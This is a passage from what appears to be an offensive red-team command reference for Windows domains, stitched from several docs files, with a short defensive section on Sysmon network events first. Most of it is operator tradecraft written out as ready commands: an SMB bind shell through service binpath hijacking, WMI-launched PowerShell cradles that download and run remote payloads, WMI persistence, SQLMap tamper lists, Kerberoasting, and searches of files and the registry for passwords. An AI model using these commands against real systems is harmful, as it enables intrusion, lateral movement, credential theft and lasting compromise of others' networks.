Each connection is linked to a process through the ProcessId and ProcessGuid fields. The event also contains the source and destination host names, IP addresses, port numbers and IPv6 status. The Initiated field separates connections the process opened (true) from ones it accepted (false); the example below is an inbound connection to port 3389. 155 | 156 | #### Event Log Entry 157 | 158 | | Field | Detail | 159 | | ------------------- | ---------------------------------------------------------------------------------- | 160 | | UtcTime | Time in UTC when event was created | 161 | | ProcessGuid | Process Guid of the process that made the network connection | 162 | | ProcessId | Process ID used by the OS to identify the process that made the network connection | 163 | | Image | File path of the process that made the network connection | 164 | | User | Name of the account that made the network connection | 165 | | Protocol | Protocol being used for the network connection | 166 | | Initiated | Indicates whether the process initiated the TCP connection | 167 | | SourceIsIpv6 | Is the source IP an IPv6 address | 168 | | SourceIp | Source IP address that made the network connection | 169 | | SourceHostname | DNS name of the host that made the network connection | 170 | | SourcePort | Source port number | 171 | | SourcePortName | Name of the source port being used | 172 | | DestinationIsIpv6 | Is the destination IP an IPv6 address | 173 | | DestinationIp | IP address destination | 174 | | DestinationHostname | DNS name of the host that is contacted | 175 | | DestinationPort | Destination port number | 176 | | DestinationPortName | Name of the destination port | 177 | 178 | #### Elastic ECS Mapping 179 | 180 | Example Event Log: 181 | 182 | ```text 183 | Network connection detected: 184 | RuleName: technique_id=T1021,technique_name=Remote Services 185 | UtcTime: 2022-01-31 19:41:19.612 186 | ProcessGuid: {ffc6f37f-da30-61f7-1500-000000000a00} 187 | ProcessId: 956 188 | Image: C:\Windows\System32\svchost.exe 189 | User: NT AUTHORITY\NETWORK SERVICE 190 | Protocol: tcp 191 | Initiated: false 192 | SourceIsIpv6: false 193 | 
SourceIp: 94.232.42.95 194 | SourceHostname: - 195 | SourcePort: 52191 196 | SourcePortName: - 197 | DestinationIsIpv6: false 198 | DestinationIp: 10.40.2.103 199 | DestinationHostname: - 200 | DestinationPort: 3389 201 | DestinationPortName: - 202 | ``` 203 | 204 | | ECS Event Mapping | Field Data (Example) | Sysmon Field Mapping | 205 | |----|----|----| 206 | | event.code | 3 | N/A | 207 | | event.kind | event | N/A | 208 | | event.module | sysmon | N/A | 209 | | event.category | Network | N/A | 210 | | event.type | connection, start, protocol | N/A | 211 | | event.provider | Microsoft-Windows-Sysmon | N/A | 212 | | event.action | Network connection detected (rule: NetworkConnect) | N/A | 213 | | destination.domain | - | DestinationHostname | 214 | | destination.ip | 10.40.2.103 | DestinationIp | 215 | | destination.port | 3389 | DestinationPort | 216 | | event.created | Jan 31, 2022 @ 14:41:22.352 | UtcTime | 217 | | network.community_id | 1:pFiw4iD296r81i3sN/GWjIMRpVk= | N/A | 218 | | network.direction | ingress | Initiated | 219 | | network.protocol | - | N/A | 220 | | network.transport | tcp | Protocol | 221 | | network.type | ipv4 | N/A | 222 | | process.entity_id | {ffc6f37f-da30-61f7-1500-000000000a00} | ProcessGuid | 223 | | process.executable | C:\Windows\System32\svchost.exe | Image | 224 | | process.name | svchost.exe | Image | 225 | | process.pid | 956 | ProcessId | 226 | | related.ip | 94.232.42.95, 10.40.2.103 | N/A | 227 | | related.user | NETWORK SERVICE | User | 228 | | source.domain | - | SourceHostname | 229 | | source.ip | 94.232.42.95 | SourceIp | 230 | | source.port | 52191 | SourcePort | 231 | | user.domain | NT AUTHORITY | User | 232 | | user.id | S-1-5-18 | User | 233 | | user.name | NETWORK SERVICE | User | 234 | 235 | ### EventID 4 Service state changed 236 | 237 | The service state change event reports the state of the Sysmon service (started or stopped). An unexpected stopped state is worth alerting on, since it leaves a gap in the telemetry described above. 
238 | -------------------------------------------------------------------------------- /docs/stylesheets/extra.css: -------------------------------------------------------------------------------- 1 | .md-grid { 2 | max-width: 1640px; 3 | } -------------------------------------------------------------------------------- /docs/web_app/sql_injections.md: -------------------------------------------------------------------------------- 1 | # SQL Injections 2 | 3 | ## SQLMap 4 | 5 | ### Clone from dev for bleeding edge: 6 | `git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev` 7 | 8 | ### Run SQLMap via a file 9 | ```python sqlmap-dev/sqlmap.py -r login-request.txt``` 10 | 11 | ### Run from file with threads: 12 | ```python sqlmap-dev/sqlmap.py -r login-request.txt --threads=10``` 13 | 14 | ### Run from file with threads and level: 15 | ```python sqlmap-dev/sqlmap.py -r login-request.txt --level=5 --risk=3``` 16 | 17 | ## Tamper all the things: 18 | 19 | ### General Tamper Testing: 20 | ```tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes``` 21 | 22 | ### MSSQL Tamper Testing: 23 | ```tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes``` 24 | 25 | ### MySQL Tamper Testing: 26 | 
```tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor``` 27 | 28 | -------------------------------------------------------------------------------- /docs/windows/collection_operations.md: -------------------------------------------------------------------------------- 1 | 2 | # Windows Collection Operations 3 | 4 | ## File Share Hunting 5 | 6 | ### Decrypt VBE scripts: 7 | 8 | ```https://blog.didierstevens.com/2016/03/29/decoding-vbe/``` 9 | 10 | ### look for all items in a directory with the * file format 11 | 12 | Here some interesting examples: 13 | 14 | ```powershell 15 | Get-ChildItem H:\DIR-TO-SCAN -Recurse -name *.vsdx 16 | Get-ChildItem H:\DIR-TO-SCAN -Recurse -name *.vsd 17 | Get-ChildItem H:\DIR-TO-SCAN -Recurse -name *.dmg 18 | Get-ChildItem H:\DIR-TO-SCAN -Recurse -name *.pptx 19 | Get-ChildItem H:\DIR-TO-SCAN -Recurse -name *.docx 20 | Get-ChildItem H:\DIR-TO-SCAN -Recurse -name *.vsd 21 | ``` 22 | 23 | ### Look for all XLS files that are password protected (Binary Format) 24 | 25 | ```powershell 26 | Get-ChildItem -path C:\ -recurse | foreach {gc -encoding byte -TotalCount 3000 -ReadCount 20 ./$_ |% {"{0:x2}" -f $_} | Select-String -Pattern "13 00 02 00" |% {$_ -match '13 00 02 00 (.{5})'}; $matches[1]} 27 | ``` -------------------------------------------------------------------------------- /docs/windows/lat_movement.md: -------------------------------------------------------------------------------- 1 | # Windows Lateral Movement 2 | 3 | ## Native SMB 4 | 5 | ### SMB Bind Shell via remote.exe & Service (SC) 6 | 7 | 1. 
**Move remote.exe to target**: 8 | ``` 9 | net use T: \\192.168.1.[x]\C$ 10 | 11 | move remote.exe T:\ 12 | ``` 13 | 14 | 2. **Target service to be started** 15 | ``` 16 | C:\Users\gte-1>sc.exe \\192.168.1.118 qc msiserver 17 | [SC] QueryServiceConfig SUCCESS 18 | 19 | SERVICE_NAME: msiserver 20 | TYPE : 20 WIN32_SHARE_PROCESS 21 | START_TYPE : 3 DEMAND_START 22 | ERROR_CONTROL : 1 NORMAL 23 | BINARY_PATH_NAME : C:\WINDOWS\system32\msiexec.exe /V 24 | LOAD_ORDER_GROUP : 25 | TAG : 0 26 | DISPLAY_NAME : Windows Installer 27 | DEPENDENCIES : RpcSs 28 | SERVICE_START_NAME : LocalSystem 29 | ``` 30 | 31 | 3. **Set Target Bin Path** 32 | ``` 33 | sc \\192.168.1.118 config msiserver binpath= "cmd.exe /C start /B C:\remote.exe /S cmd.exe pwnme" 34 | ``` 35 | 36 | 4. **Check Target Bin Path** 37 | ``` 38 | C:\Users\gte-1>sc.exe \\192.168.1.118 qc msiserver 39 | [SC] QueryServiceConfig SUCCESS 40 | 41 | SERVICE_NAME: msiserver 42 | TYPE : 20 WIN32_SHARE_PROCESS 43 | START_TYPE : 3 DEMAND_START 44 | ERROR_CONTROL : 1 NORMAL 45 | BINARY_PATH_NAME : cmd.exe /C /B C:\remote.exe /S cmd.exe pwnme 46 | LOAD_ORDER_GROUP : 47 | TAG : 0 48 | DISPLAY_NAME : Windows Installer 49 | DEPENDENCIES : RpcSs 50 | SERVICE_START_NAME : LocalSystem 51 | ``` 52 | 53 | 5. **Execute target remote.exe payload** 54 | ``` 55 | C:\Users\gte-1>sc.exe \\192.168.1.118 start msiserver 56 | [SC] StartService FAILED 1053: 57 | 58 | The service did not respond to the start or control request in a timely fashion. 59 | ``` 60 | 61 | 6. **Connect to SMB bind shell** 62 | ``` 63 | C:\Users\gte-1>"\\WIN-5696DUCBS1B\team-share\GTE-Labs\Day 4\Lab 2\remote.exe" /C 64 | 192.168.1.118 "pwnme" 65 | ************************************** 66 | *********** REMOTE ************ 67 | *********** CLIENT ************ 68 | ************************************** 69 | Connected... 70 | 71 | ]Microsoft Windows [Version 5.2.3790] 72 | (C) Copyright 1985-2003 Microsoft Corp. 
73 | 74 | C:\WINDOWS\system32> 75 | **Remote: Connected to GTE-WIN7-1-PC gte-1 [Thu 8:50 AM] 76 | ``` 77 | 78 | 7. **Clean Up Target** 79 | ``` 80 | C:\Users\gte-1>sc \\192.168.1.118 config msiserver binpath= "C:\WINDOWS\system32 81 | \msiexec.exe /V" 82 | [SC] ChangeServiceConfig SUCCESS 83 | 84 | ******ESCAPE QUOTES IF NEEDED****** 85 | sc \\192.168.1.177 config msiserver binpath= "\"C:\WINDOWS\system32\msiexec.exe /V\"" 86 | ``` 87 | 88 | 8. **Alt move patern via Reg Edit** 89 | ``` 90 | reg add \\192.168.1.177\hklm\system\currentcontrolset\services\msiserver /v ImagePath /t REG_EXPAND_SZ /d "cmd /c start /b c:\windows\system32\remote.exe /s cmd.exe pwnme" /f 91 | ``` 92 | 93 | ## Powershell Lateral Movement 94 | 95 | ### WMI Internal Reverse Port Forward 96 | 97 | Reverse portforward staged payload internal -> a download cradle 98 | 99 | ```powershell 100 | Invoke-WmiMethod -ComputerName 43.*.*.* -Class Win32_Process -Name Create -ArgumentList "powershell.exe -w 1 -C `"&([ScriptBlock]::Create((([Char[]](New-Object Net.WebClient).DownloadData('http://43.*.*.*:10080/updates/updater'))-Join'')))`"" 101 | ``` 102 | 103 | Reverse portforward staged payload internal -> a download cradle -> with PS creds 104 | 105 | ```powershell 106 | $credential = New-Object System.Management.Automation.PSCredential ("DA\some",("TestPassword" | ConvertTo-SecureString -AsPlainText -Force)); $cmd = "powershell.exe -w 1 -C `"&([ScriptBlock]::Create((([Char[]](New-Object Net.WebClient).DownloadData('http://test.com/download/test'))-Join'')))`""; Invoke-WmiMethod -ComputerName '43.160.34.168' -Credential $credential Win32_Process -Name 'Create' -ArgumentList $cmd 107 | ``` 108 | 109 | ### Unconstrained delegation to attack DA or user credentials 110 | 111 | Powershell and PowerView list of servers that allow for unconstrained delegation to attack DA or user credentials: 112 | 113 | ```powershell 114 | powerpick Get-DomainComputer -Unconstrained 115 | > Then e-mail DA with a 1x1px image 
to a UNC path. 116 | > TGS Service ticket is delivered to compromised server and stored in LSASS 117 | > Can extract and use TGT until it expires. 118 | > Can be used to get krbtgt 119 | ``` 120 | -------------------------------------------------------------------------------- /docs/windows/local_sa_cmds.md: -------------------------------------------------------------------------------- 1 | # Windows Local Situational Awareness Commands 2 | 3 | ## Find all token / user data: 4 | ```whoami /all``` 5 | ``` 6 | C:\Users\KILLSWITCH-GUI>whoami /all 7 | 8 | USER INFORMATION 9 | ---------------- 10 | 11 | User Name SID 12 | ============================== ============================================== 13 | desktop- \killswitch-gui 14 | 15 | 16 | GROUP INFORMATION 17 | ----------------- 18 | 19 | Group Name Type SID Attributes 20 | ============================================================= ================ ================================================================================================ ================================================== 21 | Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group 22 | NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Group used for deny only 23 | BUILTIN\Administrators Alias S-1-5-32-544 Group used for deny only 24 | BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group 25 | NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group 26 | CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group 27 | 28 | 29 | 30 | PRIVILEGES INFORMATION 31 | ---------------------- 32 | 33 | Privilege Name Description State 34 | ============================= ==================================== ======== 35 | SeShutdownPrivilege Shut down the system Enabled 36 | SeChangeNotifyPrivilege Bypass traverse checking Enabled 37 | SeUndockPrivilege Remove computer from docking 
station Disabled 38 | SeIncreaseWorkingSetPrivilege Increase a process working set Disabled 39 | SeTimeZonePrivilege Change the time zone Disabled 40 | 41 | 42 | ``` 43 | 44 | ## Get Local ipconfig data: 45 | ```ipconfig /all``` 46 | ``` 47 | C:\Users\KILLSWITCH-GUI>ipconfig /all 48 | 49 | Windows IP Configuration 50 | 51 | Host Name . . . . . . . . . . . . : DESKTOP- 52 | Primary Dns Suffix . . . . . . . : 53 | Node Type . . . . . . . . . . . . : Hybrid 54 | IP Routing Enabled. . . . . . . . : No 55 | WINS Proxy Enabled. . . . . . . . : No 56 | DNS Suffix Search List. . . . . . : -router.home 57 | 58 | Ethernet adapter Ethernet 2: 59 | 60 | Connection-specific DNS Suffix . : 61 | Description . . . . . . . . . . . : PANGP Virtual Ethernet Adapter 62 | Physical Address. . . . . . . . . : 02-50-41-00-00-01 63 | DHCP Enabled. . . . . . . . . . . : No 64 | Autoconfiguration Enabled . . . . : Yes 65 | Link-local IPv6 Address . . . . . : fe80::344b:2314:f01d:a51%8(Preferred) 66 | IPv4 Address. . . . . . . . . . . : 10.0.0.235(Preferred) 67 | Subnet Mask . . . . . . . . . . . : 255.255.255.255 68 | Default Gateway . . . . . . . . . : 0.0.0.0 69 | DHCPv6 IAID . . . . . . . . . . . : 419582017 70 | DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-20-E4-0D-90-30-9C-23-04-69-34 71 | DNS Servers . . . . . . . . . . . : ::1 72 | 127.0.0.1 73 | NetBIOS over Tcpip. . . . . . . . 
: Enabled 74 | 75 | ``` 76 | 77 | ## List all virtual / physical drives with Powershell: 78 | ```gdr -PSProvider 'FileSystem'``` 79 | ``` 80 | PS C:\Users\KILLSWITCH-GUI> gdr -PSProvider 'FileSystem' 81 | 82 | Name Used (GB) Free (GB) Provider Root CurrentLocation 83 | ---- --------- --------- -------- ---- --------------- 84 | B 0.00 0.25 FileSystem B:\ 85 | C 138.56 325.85 FileSystem C:\ Users\KILLSWITCH-GUI 86 | D 4503.95 3872.36 FileSystem D:\ 87 | 88 | ``` 89 | 90 | ```[System.IO.DriveInfo]::GetDrives() | Format-Table``` 91 | ``` 92 | Name DriveType DriveFormat IsReady AvailableFreeSpace TotalFreeSpace TotalSize RootDirectory VolumeLabel 93 | ---- --------- ----------- ------- ------------------ -------------- --------- ------------- ----------- 94 | A:\ Network False A:\ 95 | C:\ Fixed NTFS True 771920580608 771920580608 988877418496 C:\ Windows 96 | D:\ Fixed NTFS True 689684144128 689684144128 1990045179904 D:\ Big Drive 97 | E:\ CDRom False E:\ 98 | G:\ Network NTFS True 69120000 69120000 104853504 G:\ GratefulDead 99 | ``` 100 | 101 | 102 | ## Check if host is alive via cmd: 103 | ``` 104 | ping -n 1 host.com - overt 105 | nbtstat -A host.com - Covert: uses NetBios TCP/IP to check if interface is up 106 | ``` 107 | 108 | ## List the password policy for the domain: 109 | ``` 110 | net accounts 111 | ``` 112 | ``` 113 | C:\Users\KILLSWITCH-GUI>net accounts 114 | Force user logoff how long after time expires?: Never 115 | Minimum password age (days): 0 116 | Maximum password age (days): 42 117 | Minimum password length: 0 118 | Length of password history maintained: None 119 | Lockout threshold: Never 120 | Lockout duration (minutes): 30 121 | Lockout observation window (minutes): 30 122 | Computer role: WORKSTATION 123 | ``` 124 | 125 | ## Get the current DC you're talking to: 126 | ``` 127 | cmd /c echo %LOGONSERVER% 128 | powershell echo $ENV:LOGONSERVER 129 | ``` 130 | 131 | ## Resolve host-name to IP addr IPv4 without ping via Powershell: 132 | ``` 133 | 
[System.Net.DNS]::GetHostAddresses("NAME-PC") 134 | ``` 135 | ``` 136 | PS C:\Users\KILLSWITCH-GUI> [System.Net.DNS]::GetHostAddresses("google.com") 137 | 138 | 139 | Address : 2382879148 140 | AddressFamily : InterNetwork 141 | ScopeId : 142 | IsIPv6Multicast : False 143 | IsIPv6LinkLocal : False 144 | IsIPv6SiteLocal : False 145 | IsIPv6Teredo : False 146 | IsIPv4MappedToIPv6 : False 147 | IPAddressToString : 172.217.7.142 148 | ``` 149 | 150 | ## Resolve ip to host-name: 151 | ```powerview 152 | [System.Net.Dns]::GetHostbyAddress("8.8.8.8") 153 | ``` 154 | ``` 155 | PS C:\Users\KILLSWITCH-GUI> [System.Net.Dns]::GetHostbyAddress("8.8.8.8") 156 | 157 | HostName Aliases AddressList 158 | -------- ------- ----------- 159 | google-public-dns-a.google.com {} {8.8.8.8} 160 | ``` 161 | 162 | ## List last boot time via Powershell: 163 | ```powershell 164 | gwmi Win32_OperatingSystem | select __SERVER,@{label='LastRestart';expression={$_.ConvertToDateTime($_.LastBootUpTime}} 165 | ``` -------------------------------------------------------------------------------- /docs/windows/network_sa_cmds.md: -------------------------------------------------------------------------------- 1 | # Windows Network Situational Awareness Commands 2 | 3 | ## PowerView Situational Awareness 4 | 5 | *PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows "net *" commands, which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality.* 6 | 7 | *It also implements various useful metafunctions, including some custom-written user-hunting functions which will identify where on the network specific users are logged into. It can also check which machines on the domain the current user has local administrator access on. Several functions for the enumeration and abuse of domain trusts also exist. 
See function descriptions for appropriate usage and available options. For detailed output of underlying functionality, pass the -Verbose or -Debug flags.* 8 | 9 | *For functions that enumerate multiple machines, pass the -Verbose flag to get a progress status as each host is enumerated. Most of the "meta" functions accept an array of hosts from the pipeline.*[^1] 10 | 11 | !!! note 12 | All command can be run via PowerPick to increase your OPSEC. Reducing your 13 | forensic artifact impact. *Allowing the execution of Powershell functionality without the use of Powershell.exe. Primarily this project uses.NET assemblies/libraries to start execution of the Powershell scripts*[^2] 14 | 15 | ### Get computers in LDAP search base and show the DNS name and OS only 16 | 17 | ```powershell 18 | Get-DomainComputer -searchbase "LDAP://OU=place,OU=thing,DC=domain,DC=loves,DC=com" --Properties dnshostname,operatingsystem 19 | ``` 20 | 21 | ### Computers with OS matching 2008, with a OU of intrest 22 | 23 | ```powershell 24 | Get-DomainComputer -searchbase "LDAP://OU=place,OU=thing,DC=domain,DC=loves,DC=com" -OperatingSystem *2008* 25 | ``` 26 | 27 | ### Computers in LDAP search base and pipe host names of intrest to Get-NetSession 28 | 29 | ```powershell 30 | powerpick Get-DomainComputer -SearchBase "LDAP://OU=place,OU=thing,DC=domain,DC=loves,DC=com" | where-object {$_.dnshostname -like "*HOST-NAME*"} | Get-NetSession 31 | ``` 32 | 33 | ### Remote Desktop Users for a machine for just medium intg RDP 34 | 35 | ```powershell 36 | Get-NetLocalGroupMember HOST-NAME -GroupName "Remote Desktop Users" 37 | ``` 38 | 39 | ### Admins for a machine for just medium intg RDP 40 | 41 | ```powershell 42 | Get-NetLocalGroupMember HOST-NAME 43 | ``` 44 | 45 | ### Corelate GPOs to domain system 46 | 47 | ```powershell 48 | Get-NetOU -GPLink "{45172B9C-749A-479A-A9C7-4F85083CD517}" | % { Get-DomainComputer -ADSPath $_.distinguishedname -Properties dnshostname} 49 | ``` 50 | 51 | ### Find all 
computers and pipe into local admins of machines 52 | 53 | ```powershell 54 | Get-DomainComputer -searchbase "LDAP://OU=Location Location,OU=SOME,DC=am,DC=somthing,DC=com" -Properties name FindOne | Get-NetLocalGroupMember -Method API -Properties ComputerName,GroupName,MemberName| FT -Wrap 55 | ``` 56 | 57 | ### Find all computer objects / systems that have a GPO applied 58 | 59 | ```powershell 60 | Get-DomainOU -GPLink "{A8E139C2-8A5C-455B-905F-FF509D112E8C}" | % { Get-DomainComputer -ADSPath $_.distinguishedname -Properties dnshostname} 61 | ``` 62 | 63 | ### Find all accounts with admin count set / DC sync 64 | 65 | ```powershell 66 | Get-DomainUser -admincount -Properties samaccountname 67 | ``` 68 | 69 | ### Check if user has rights to DC sync with the PDC 70 | 71 | ```powershell 72 | Get-ObjectACL "DC=testlab,DC=local" -ResolveGUIDs | ? { 73 | ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get') 74 | } 75 | ``` 76 | 77 | ### Pull all email's from user object of a certain OU and output to file for download 78 | 79 | ```powershell 80 | get-domainuser -searchbase "LDAP://OU=place,OU=thing,DC=domain,DC=loves,DC=com" -properties cn,mail,userprincipalname,extensionattribute10,msrtcsip-primaryuseraddress | out-file -encoding ASCII C:\Windows\Tasks\contacts.txt 81 | ``` 82 | 83 | [^1]: https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon#powerview 84 | [^2]: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick -------------------------------------------------------------------------------- /docs/windows/persistence.md: -------------------------------------------------------------------------------- 1 | # Windows Persistence 2 | 3 | ## WMI Subscription 4 | 5 | ### Install wmi persistence for on-boot 6 | 7 | Great research can be found on Black Hats site[^1]. The script can be found at https://github.com/PowerShellMafia/PowerSploit/blob/master/Persistence/Persistence.psm1 or in the Empire agent. 
8 | 9 | !!! warning 10 | This method sometimes returns two callbacks on boot! 11 | 12 | ```powershell 13 | Install-WmiSubscription -CustomEvent -Query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320" -Namespace "root\cimv2" -DiskStorageLocation "C:\Windows\tasks\cat.jpg" -Command "`"&([ScriptBlock]::Create((([Char[]](New-Object Net.WebClient).DownloadData('http://www.--SNIP--.com/corp/priv/cloud/adp_update.pdf'))-Join'')))`"" -Verbose 14 | ``` 15 | 16 | [^1]: https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf -------------------------------------------------------------------------------- /docs/windows/priv_esc.md: -------------------------------------------------------------------------------- 1 | # Windows Privilege Escalation Commands 2 | 3 | ## Host Privilege Escalation 4 | 5 | ### Schduled Tasks Path Alteration 6 | Schduled tasks we can alter by path? They run at system context: 7 | 8 | ```schtasks /query /fo LIST /v``` 9 | ``` 10 | C:\Users\KILLSWITCH-GUI>schtasks /query /fo LIST /v 11 | 12 | Folder: \ 13 | HostName: DESKTOP- 14 | TaskName: \ASC10_PerformanceMonitor 15 | Next Run Time: N/A 16 | Status: Ready 17 | Logon Mode: Interactive only 18 | Last Run Time: 11/30/1999 12:00:00 AM 19 | Last Result: 267011 20 | Author: KILLSWITCH-GUI 21 | Task To Run: C:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe /Task 22 | Start In: N/A 23 | Comment: N/A 24 | Scheduled Task State: Enabled 25 | Idle Time: Disabled 26 | Power Management: 27 | Run As User: KILLSWITCH-GUI 28 | Delete Task If Not Rescheduled: Disabled 29 | Stop Task If Runs X Hours and X Mins: Disabled 30 | Schedule: Scheduling data is not available in this format. 
31 | Schedule Type: At logon time 32 | Start Time: N/A 33 | Start Date: N/A 34 | End Date: N/A 35 | Days: N/A 36 | Months: N/A 37 | Repeat: Every: N/A 38 | Repeat: Until: Time: N/A 39 | Repeat: Until: Duration: N/A 40 | Repeat: Stop If Still Running: N/A 41 | 42 | ``` 43 | 44 | ### Evaluating Vulnerable Services 45 | We can use the `net start` command to evaluate services on the system: 46 | 47 | ``` 48 | C:\Users\KILLSWITCH-GUI>net start 49 | These Windows services are started: 50 | 51 | Advanced SystemCare Service 10 52 | Application Information 53 | Application Management 54 | Background Intelligent Transfer Service 55 | Background Tasks Infrastructure Service 56 | Base Filtering Engine 57 | cFosSpeed System Service 58 | CNG Key Isolation 59 | COM+ Event System 60 | Computer Browser 61 | Connected Devices Platform Service 62 | Connected Devices Platform User Service_7e8e2a 63 | Connected User Experiences and Telemetry 64 | Contact Data_7e8e2a 65 | CoreMessaging 66 | 67 | ``` 68 | 69 | ### Evaluating Vulnerable Drivers 70 | Look for vuln drivers loaded, we often don't spend enough time looking at this: 71 | 72 | ```DRIVERQUERY /FO table``` 73 | ``` 74 | C:\Users\KILLSWITCH-GUI>DRIVERQUERY /FO table 75 | 76 | Module Name Display Name Driver Type Link Date 77 | ============ ====================== ============= ====================== 78 | 1394ohci 1394 OHCI Compliant Ho Kernel 12/10/2006 4:44:38 PM 79 | 3ware 3ware Kernel 5/18/2015 6:28:03 PM 80 | ACPI Microsoft ACPI Driver Kernel 12/9/1975 6:17:08 AM 81 | AcpiDev ACPI Devices driver Kernel 12/7/1993 6:22:19 AM 82 | acpiex Microsoft ACPIEx Drive Kernel 3/1/2087 8:53:50 AM 83 | acpipagr ACPI Processor Aggrega Kernel 1/24/2081 8:36:36 AM 84 | AcpiPmi ACPI Power Meter Drive Kernel 11/19/2006 9:20:15 PM 85 | acpitime ACPI Wake Alarm Driver Kernel 2/9/1974 7:10:30 AM 86 | ADP80XX ADP80XX Kernel 4/9/2015 4:49:48 PM 87 | 88 | ``` 89 | 90 | ### Evaluating KBs/Patches 91 | Look for KB / Patches installed or not: 92 | ```wmic 
qfe get Caption,Description,HotFixID,InstalledOn``` 93 | ``` 94 | C:\Users\KILLSWITCH-GUI>wmic qfe get Caption,Description,HotFixID,InstalledOn 95 | Caption Description HotFixID InstalledOn 96 | http://support.microsoft.com/?kbid=4022405 Update KB4022405 6/8/2017 97 | http://support.microsoft.com/?kbid=4022730 Security Update KB4022730 6/8/2017 98 | http://support.microsoft.com/?kbid=4025376 Security Update KB4025376 7/12/2017 99 | http://support.microsoft.com/?kbid=4025342 Security Update KB4025342 7/15/2017 100 | 101 | ``` 102 | ```wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."``` 103 | ``` 104 | C:\Users\KILLSWITCH-GUI> wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB4022405" 105 | http://support.microsoft.com/?kbid=4022405 Update KB4022405 6/8/2017 106 | ``` 107 | 108 | ### Locating Unattended configs 109 | Look for unattended configs in the following dirs: 110 | ``` 111 | c:\sysprep.inf 112 | c:\sysprep\sysprep.xml 113 | %WINDIR%\Panther\Unattend\Unattended.xml 114 | %WINDIR%\Panther\Unattended.xml 115 | ``` 116 | 117 | ### Locating AlwaysInstallElevated 118 | key set to DWORD 1: 119 | ```reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated``` 120 | ``` 121 | C:\Users\KILLSWITCH-GUI>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 122 | ERROR: The system was unable to find the specified registry key or value. 123 | ``` 124 | 125 | ### Locating Sensitive Files 126 | Search the file system for file names containing certain keywords via cmd: 127 | ```dir /s *pass* == *cred* == *vnc* == *.config*``` 128 | ``` 129 | C:\Users\KILLSWITCH-GUI>dir /s *pass* == *cred* == *vnc* == *.config* 130 | Volume in drive C has no label. 
131 | Volume Serial Number is DA67-AFD2 132 | 133 | Directory of C:\Users\KILLSWITCH-GUI\AppData\Local 134 | 135 | 06/28/2017 09:04 AM password-app 136 | 0 File(s) 0 bytes 137 | ``` 138 | 139 | ### Locating Sensitive Data In Files 140 | Search certain file types for a keyword via cmd: 141 | ```findstr /si password *.xml *.ini *.txt``` 142 | ``` 143 | C:\Users\KILLSWITCH-GUI>findstr /si password *.xml *.ini *.txt 144 | .PyCharmCE2017.1\config\options\ide.general.xml: 145 | AppData\Local\lxss\rootfs\usr\share\dbus-1\interfaces\org.freedesktop.Accounts.User.xml: 146 | ``` 147 | 148 | ### Locating Passwords Within Thhe Registry 149 | ``` 150 | reg query HKLM /f password /t REG_SZ /s 151 | reg query HKCU /f password /t REG_SZ /s 152 | ``` 153 | ``` 154 | C:\Users\KILLSWITCH-GUI>reg query HKLM /f password /t REG_SZ /s 155 | 156 | HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0fafd998-c8e8-42a1-86d7-7c10c664a415} 157 | (Default) REG_SZ Picture Password Enrollment UX 158 | 159 | HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2135f72a-90b5-4ed3-a7f1-8bb705ac276a} 160 | (Default) REG_SZ PicturePasswordLogonProvider 161 | ``` 162 | 163 | ### Locating Unquoted Service Paths 164 | ```wmic service get name,startmode,pathname | findstr /i /v ":\windows\" | findstr /v """``` 165 | ``` 166 | C:\Users\KILLSWITCH-GUI>wmic service get name,startmode,pathname | findstr /i /v ":\windows\" | findstr /v """ 167 | Name PathName StartMode 168 | AJRouter C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted Manual 169 | ALG C:\WINDOWS\System32\alg.exe Manual 170 | AppIDSvc C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted 171 | ``` 172 | 173 | --- 174 | 175 | ## Domain Privilege Escalation 176 | 177 | ### Kerbroasting 178 | https://gist.github.com/HarmJ0y/cc1004307157e372fc5bd3f89e553059 179 | 180 | #### Kerbroast a domain and set for crashing is hashcat format: 181 | ```powershell 182 | Invoke-Kerberoast -OutputFormat Hashcat | fl 183 | ``` 184 | 185 | #### ACL rights to 
